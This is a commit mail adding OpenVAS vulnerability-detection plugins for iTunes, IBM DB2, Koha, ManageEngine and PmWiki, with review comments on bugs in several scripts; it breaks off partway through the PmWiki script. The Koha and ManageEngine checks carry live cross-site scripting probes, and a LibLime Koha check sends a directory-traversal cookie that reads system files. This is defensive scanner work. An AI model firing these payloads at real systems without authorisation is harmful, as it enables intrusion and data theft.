[Openvas-commits] r12227 - in trunk/openvas-plugins: . scripts

scm-commit@wald.intevation.org scm-commit at wald.intevation.org
Wed Nov 30 16:19:11 CET 2011


Author: antu123
Date: 2011-11-30 16:19:06 +0100 (Wed, 30 Nov 2011)
New Revision: 12227

Added:
   trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl
   trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl
   trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl
   trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl
Modified:
   trunk/openvas-plugins/ChangeLog
Log:
Added new plugins

Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/ChangeLog	2011-11-30 15:19:06 UTC (rev 12227)
@@ -1,3 +1,20 @@
+2011-11-30  Antu Sanadi <santu at secpod.com>
+
+	* scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl,
+	scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl,
+	scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl,
+	scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl,
+	scripts/secpod_vmware_fusion_detect_macosx.nasl,
+	scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl,
+	scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl,
+	scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl,
+	scripts/secpod_realplayer_mult_vuln_nov11_win.nasl,
+	scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl,
+	scripts/secpod_koha_opac_mult_xss_vuln.nasl,
+	scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl,
+	scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl:
+	Added new plugins.
+
 2011-11-30  Michael Meyer <michael.meyer at greenbone.net>
 
 	* scripts/gb_sit_50742.nasl,

Added: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,84 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apple iTunes Remote Code Execution Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902639);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-0259");
+  script_bugtraq_id(50672);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-28 16:04:18 +0530 (Mon, 28 Nov 2011)");
+  script_name("Apple iTunes Remote Code Execution Vulnerability (Mac OS X)");
+  desc = "
+  Overview: This host is installed with Apple iTunes and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the improper verification of authenticity of
+  updates, allows man-in-the-middle attack execute arbitrary code via a
+  Trojan horse update.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code in
+  the context of the user running the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Apple iTunes version prior to 10.5.1
+
+  Fix: Upgrade to Apple Apple iTunes version 10.5.1 or later,
+  For updates refer, http://www.apple.com/itunes/download/
+
+  References:
+  http://support.apple.com/kb/HT5030
+  http://support.apple.com/kb/HT4981
+  http://lists.apple.com/archives/security-announce/2011/Nov/msg00003.html ";
+
+  script_description(desc);
+  script_summary("Check for apple iTunes version");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Mac OS X Local Security Checks");
+  script_dependencies("secpod_itunes_detect_macosx.nasl");
+  script_require_keys("Apple/iTunes/MacOSX/Version");
+  exit(0);
+}
+
+include("version_func.inc");
+
+## Get Apple iTunes version from KB
+itunesVer = get_kb_item("Apple/iTunes/MacOSX/Version");
+if(itunesVer)
+{
+  ## Check for Apple iTunes versions < 10.5.1
+  if(version_is_less(version:itunesVer, test_version:"10.5.1")){
+    security_hole(0);
+  }
+}
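Review bot: The report text in `desc` has wording slips that end up verbatim in scan results: the Fix line reads "Upgrade to Apple Apple iTunes" and the insight sentence "allows man-in-the-middle attack execute arbitrary code" is missing words. Suggested wording is `Fix: Upgrade to Apple iTunes version 10.5.1 or later,` and `updates, which allows a man-in-the-middle attacker to execute arbitrary code via a`. The same two strings are repeated in secpod_apple_itunes_remote_code_exec_vuln_win.nasl. The two scripts also differ in shape for the same logic (nested `if(itunesVer)` here, early `exit(0)` in the Windows file); one form for both would make the pair easier to maintain.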


Property changes on: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,85 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Apple iTunes Remote Code Execution Vulnerability (Windows)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902638);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-0259");
+  script_bugtraq_id(50672);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-28 15:07:07 +0530 (Mon, 28 Nov 2011)");
+  script_name("Apple iTunes Remote Code Execution Vulnerability (Windows)");
+  desc = "
+  Overview: This host is installed with Apple iTunes and is prone to remote
+  code execution vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the improper verification of authenticity of
+  updates, allows man-in-the-middle attack execute arbitrary code via a
+  Trojan horse update.
+
+  Impact:
+  Successful exploitation could allow attackers to execute arbitrary code in
+  the context of the user running the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Apple iTunes version prior to 10.5.1 (10.5.1.42)
+
+  Fix: Upgrade to Apple Apple iTunes version 10.5.1 or later,
+  For updates refer, http://www.apple.com/itunes/download/
+
+  References:
+  http://support.apple.com/kb/HT5030
+  http://support.apple.com/kb/HT4981
+  http://lists.apple.com/archives/security-announce/2011/Nov/msg00003.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of Apple iTunes");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("secpod_apple_itunes_detection_win_900123.nasl");
+  script_require_keys("iTunes/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+ituneVer= get_kb_item("iTunes/Win/Ver");
+if(!ituneVer){
+  exit(0);
+}
+
+## Apple iTunes version < 10.5.1 (10.5.1.42)
+if(version_is_less(version:ituneVer, test_version:"10.5.1.42")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_apple_itunes_remote_code_exec_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,90 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# IBM DB2 'DT_RPATH' Insecure Library Loading Code Execution Vulnerabilities
+#
+# Authors:
+# Antu Sanadi <santu at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902489);
+  script_version("$Revision$");
+  script_bugtraq_id(48514);
+  script_cve_id("CVE-2011-4061");
+  script_tag(name:"cvss_base", value:"6.9");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-08 15:07:48 +0530 (Tue, 08 Nov 2011)");
+  script_name("IBM DB2 'DT_RPATH' Insecure Library Loading Code Execution Vulnerabilities");
+  desc = "
+  Overview: The host is running IBM DB2 and is prone to insecure library
+  loading vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to an error in 'db2rspgn' and 'kbbacf1', which allow
+  users to gain privileges via a Trojan horse libkbb.so in the current working
+  directory.
+
+  Impact: Successful exploitation allows local unauthenticated users to gain
+  elevated privileges and execute arbitrary code with root privileges.
+
+  Impact Level: Application.
+
+  Affected Software/OS:
+  IBM DB2 version 9.7
+
+  Fix: No solution or patch is available as on 30th, November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  http://www-01.ibm.com/support/docview.wss?rs=71&uid=swg27007053
+
+  References:
+  http://www.securityfocus.com/archive/1/518659
+  http://www.nth-dimension.org.uk/downloads.php?id=77
+  http://www.nth-dimension.org.uk/downloads.php?id=83 ";
+
+  script_description(desc);
+  script_summary("Check for the version of IBM DB2");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Databases");
+  script_dependencies("gb_ibm_db2_remote_detect.nasl");
+  script_require_keys("IBM-DB2/Remote/ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+ibmVer = get_kb_item("IBM-DB2/Remote/ver");
+if(!ibmVer){
+  exit(0);
+}
+
+if(ibmVer =~ "^0907\.*")
+{
+  # IBM DB2 9.7 => 09000
+  if(version_is_equal(version:ibmVer, test_version:"09000"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
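Review bot: The two version conditions at the end of the script look mutually exclusive, so this check would never report. The outer test only admits KB values starting with `0907`, while the inner `version_is_equal(version:ibmVer, test_version:"09000")` compares against a string that does not start with `0907`; assuming version_is_equal compares the full version strings, `security_hole(0)` is unreachable. The comment `# IBM DB2 9.7 => 09000` suggests the constant is a typo, so it should be checked against the format that gb_ibm_db2_remote_detect.nasl stores (possibly `09070`, to be confirmed). Since the description names all of version 9.7 as affected, the prefix match alone may be what is intended. Separately, `\.*` in the regex matches zero or more literal dots and adds nothing to `^0907`.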


Property changes on: trunk/openvas-plugins/scripts/secpod_ibm_db2_dt_rpath_insecure_lib_load_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,112 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Koha Library Software OPAC Multiple Cross Site Scripting Vulnerabilities
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902640);
+  script_version("$Revision$");
+  script_bugtraq_id(48895);
+  script_tag(name:"cvss_base", value:"4.5");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-30 11:26:06 +0530 (Wed, 30 Nov 2011)");
+  script_name("Koha Library Software OPAC Multiple Cross Site Scripting Vulnerabilities");
+  desc = "
+  Overview: The host is running Koha Library Software and is prone to multiple
+  cross-site scripting vulnerabilities.
+
+  Vulnerability Insight:
+  The flaws are caused due to improper validation of user-supplied input in
+  'bib_list' parameter to opac-downloadcart.pl, 'biblionumber' parameter to
+  opac-serial-issues.pl, opac-addbybiblionumber.pl, opac-review.pl and
+  'shelfid' parameter to opac-sendshelf.pl and opac-downloadshelf.pl.
+
+  Impact:
+  Successful exploitation will allow remote attackers to insert arbitrary HTML
+  and script code, which will be executed in a user's browser session in the
+  context of an affected site.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  Koha Library Software versions 3.4.1 and prior.
+
+  Fix: Upgrade to Koha Library Software version 3.4.2 or later,
+  For updates refer, http://koha-community.org/
+
+  References:
+  http://secunia.com/advisories/45435/
+  http://koha-community.org/koha-3-4-2/
+  http://en.securitylab.ru/lab/PT-2011-05
+  http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=6518
+  http://packetstormsecurity.org/files/view/103440/PT-2011-05.txt
+  http://osvdb.org/vendor/118855-koha-library-software-community/1 ";
+
+  script_description(desc);
+  script_summary("Check if Koha Library Software is vulnerable to XSS");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+
+## Get HTTP port
+port = get_http_port(default:80);
+
+## Check port state
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Iterate over possible paths
+foreach dir (make_list("/", "/koha", cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: dir + "/opac-main.pl", port:port);
+  res = http_send_recv(port:port, data:req);
+
+  ## Confirm the application before trying exploit
+  if("koha" >< res && "Library" >< res)
+  {
+    ## Construct the attack request
+    url = string(dir, '/koha/opac-review.pl?biblionumber="<script>alert' +
+                      '(document.cookie)</script>');
+
+    ## Try attack and check the response to confirm vulnerability
+    if(http_vuln_check(port:port, url:url, pattern:"<script>alert" +
+                       "\(document.cookie\)</script>"))
+    {
+      security_warning(port);
+      exit(0);
+    }
+  }
+}
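Review bot: The test URL is built from a different base than the one used to confirm the application: detection requests `dir + "/opac-main.pl"`, but the probe goes to `string(dir, '/koha/opac-review.pl?...')`. For the `/koha` entry in the directory list this yields `/koha/koha/opac-review.pl`, so an installation found there would most likely be reported as not vulnerable; dropping the extra `/koha` segment from the `string(dir, ...)` call keeps both requests on the same base. The `/` entry also produces a doubled slash (`//opac-main.pl`), which not every server normalises. `host_details.inc` is included, but nothing from it appears to be used in this script.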


Property changes on: trunk/openvas-plugins/scripts/secpod_koha_opac_mult_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,120 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# LibLime Koha 'KohaOpacLanguage' Parameter Local File Inclusion Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902593);
+  script_version("$Revision$");
+  script_bugtraq_id(50812);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-29 17:17:17 +0530 (Tue, 29 Nov 2011)");
+  script_name("LibLime Koha 'KohaOpacLanguage' Parameter Local File Inclusion Vulnerability");
+  desc = "
+  Overview: The host is running LibLime Koha and is prone to local file
+  inclusion vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to the cgi-bin/opac/opac-main.pl script not properly
+  sanitizing user input supplied to the cgi-bin/koha/mainpage.pl script via
+  the 'KohaOpacLanguage' cookie. This can be exploited to include arbitrary
+  files from local resources via directory traversal attacks and URL-encoded
+  NULL bytes.
+
+  Impact:
+  Successful exploitation will allow remote attackers to obtain potentially
+  sensitive information and execute arbitrary local scripts in the context of
+  the Web server process.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  LibLime Koha versions 4.02.06 and prior.
+
+  Fix: No solution or patch is available as on 29th, November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.koha.org
+
+  References:
+  http://osvdb.org/show/osvdb/77322
+  http://secunia.com/advisories/46980/
+  http://www.exploit-db.com/exploits/18153
+  http://www.vigasis.com/en/?guncel_guvenlik=LibLime%20Koha%20%3C=%204.2%20Local%20File%20Inclusion%20Vulnerability&lnk=exploits/18153 ";
+
+  script_description(desc);
+  script_summary("Check if LibLime Koha is vulnerable to local file inclusion");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("host_details.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:80);
+
+## Check Port State
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+## Iterate over possible paths
+foreach dir (make_list(cgi_dirs()))
+{
+  ## Send and Receive the response
+  req = http_get(item: dir + "/koha/opac-main.pl", port:port);
+  res = http_send_recv(port:port, data:req);
+
+  ## Confirm the application before trying exploit
+  if("koha" >< res && "Library" >< res)
+  {
+    files = traversal_files();
+
+    foreach file (keys(files))
+    {
+      ## Construct Directory Traversal Attack,
+      cookie = "sessionID=1;KohaOpacLanguage=../../../../../../../../" +
+               files[file] + "%00";
+      req1 = string(chomp(req), '\r\nCookie: ', cookie, '\r\n\r\n');
+
+      ## Send exploit
+      res = http_send_recv(port:port, data:req1);
+
+      ## Check the response to confirm vulnerability
+      if(egrep(pattern:file, string:res))
+      {
+        security_hole(port);
+        exit(0);
+      }
+    }
+  }
+}
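Review bot: The path probed in the loop, `dir + "/koha/opac-main.pl"`, matches neither script path named in the description (`cgi-bin/opac/opac-main.pl` and `cgi-bin/koha/mainpage.pl`), so it is unclear which install layout the check covers. If the affected script normally sits under `/opac/`, hosts with that layout are skipped silently and the scan reports nothing for them. A comment above the loop such as `## Koha OPAC is expected at <cgi dir>/koha/opac-main.pl`, or an added `/opac` variant, would make the coverage explicit. The application test `"koha" >< res && "Library" >< res` is case-sensitive and loose, but it only gates the probe; the final `egrep` on the file pattern decides the result.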


Property changes on: trunk/openvas-plugins/scripts/secpod_liblime_koha_kohaopaclanguage_param_lfi_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,101 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# Zoho ManageEngine ADSelfService Plus Cross Site Scripting Vulnerability
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902757);
+  script_version("$Revision$");
+  script_tag(name:"cvss_base", value:"4.3");
+  script_tag(name:"risk_factor", value:"Medium");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-18 11:15:15 +0530 (Fri, 18 Nov 2011)");
+  script_name("Zoho ManageEngine ADSelfService Plus Cross Site Scripting Vulnerability");
+  desc = "
+  Overview: This host is running Zoho ManageEngine ADSelfService Plus and is
+  prone to cross site scripting vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error in corporate directory search feature, which
+  allows remote attackers to cause XSS attacks.
+
+  Impact:
+  Successful exploitation will let the attacker to terminate javascript
+  variable declarations, escape encapsulation, and append arbitrary javascript
+  code.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  ManageEngine ADSelfServicePlus version 4.5 Build 4521
+
+  Fix: No solution or patch is available as on 18th, November 2011. Information
+  regarding this issue will be updated once the solution details are available.
+  For updates refer, http://www.manageengine.co.in/products/self-service-password/download.html
+
+  References:
+  http://www.securityfocus.com/archive/1/520562
+  http://packetstormsecurity.org/files/107093/vrpth-2011-001.txt ";
+
+  script_description(desc);
+  script_summary("Check if Zoho ManageEngine ADSelfService Plus is prone to XSS");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
+  script_require_ports("Services/www", 80);
+  exit(0);
+}
+
+
+include("http_func.inc");
+include("version_func.inc");
+include("http_keepalive.inc");
+
+## Get HTTP Port
+port = get_http_port(default:8888);
+if(!get_port_state(port)) {
+  exit(0);
+}
+
+foreach dir (make_list("/", "/manageengine", cgi_dirs()))
+{
+  sndReq = http_get(item:string(dir , "/EmployeeSearch.cc"), port:port);
+  rcvRes = http_send_recv(port:port, data:sndReq);
+
+  ## Confirm the application
+  if("<title>ManageEngine - ADSelfService Plus</title>" >< rcvRes)
+  {
+    ## Construct attack
+    url = string (dir + '/EmployeeSearch.cc?searchType=contains&searchBy=' +
+                    'ALL_FIELDS&searchString=";alert(document.cookie);"');
+
+    ## Confirm exploit worked properly or not
+    if(http_vuln_check(port:port, url:url, pattern:";alert\(document.cookie\);"))
+    {
+      security_warning(port:port);
+      exit(0);
+    }
+  }
+}
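Review bot: `script_category(ACT_GATHER_INFO)` does not match what the script does: it sends a script-injection test string to `EmployeeSearch.cc`, and the Koha XSS check added in this same commit uses `ACT_ATTACK` for the same kind of request. With the current category, scan policies that select plugins by category treat an active probe as passive information gathering, so `script_category(ACT_ATTACK);` is the better fit. The port hints also disagree, `script_require_ports("Services/www", 80)` against `get_http_port(default:8888)`; `script_require_ports("Services/www", 8888);` would match the default used below. `version_func.inc` is included but no version function is called.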


Property changes on: trunk/openvas-plugins/scripts/secpod_manageengine_adself_service_plus_xss_vuln.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_pmwiki_pagelist_order_param_php_code_inj_vuln.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,138 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# PmWiki Pagelist 'order' Parameter PHP Code Injection Vulnerability
+#
+# Authors:
+# Sooraj KS <kssooraj at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902592);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-4453");
+  script_bugtraq_id(50776);
+  script_tag(name:"cvss_base", value:"7.5");
+  script_tag(name:"risk_factor", value:"High");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-28 13:13:13 +0530 (Mon, 28 Nov 2011)");
+  script_name("PmWiki Pagelist 'order' Parameter PHP Code Injection Vulnerability");
+  desc = "
+  Overview: The host is running PmWiki and is prone to PHP code injection
+  vulnerability.
+
+  Vulnerability Insight:
+  The flaw is caused due to improper validation of user-supplied input via
+  the 'order' argument of a pagelist directive within a PmWiki page, which
+  allows attackers to execute arbitrary PHP code.
+
+  Impact:
+  Successful exploitation will allow remote attackers to inject and execute
+  arbitrary PHP code in the context of the affected application.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  PmWiki versions 2.0.0 to 2.2.34
+
+  Fix: Upgrade to PmWiki version 2.2.35 or later,
+  For updates refer, http://pmwiki.org/pub/pmwiki
+
+  References:
+  http://osvdb.org/show/osvdb/77261
+  http://secunia.com/advisories/46968
+  http://www.pmwiki.org/wiki/PITS/01271
+  http://www.exploit-db.com/exploits/18149
+  http://www.securityfocus.com/archive/1/520631
+  http://www.pmwiki.org/wiki/PmWiki/ChangeLog#v2235 ";
+
+  script_description(desc);
+  script_summary("Check if PmWiki is vulnerable to PHP code injection");
+  script_category(ACT_ATTACK);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("Web application abuses");
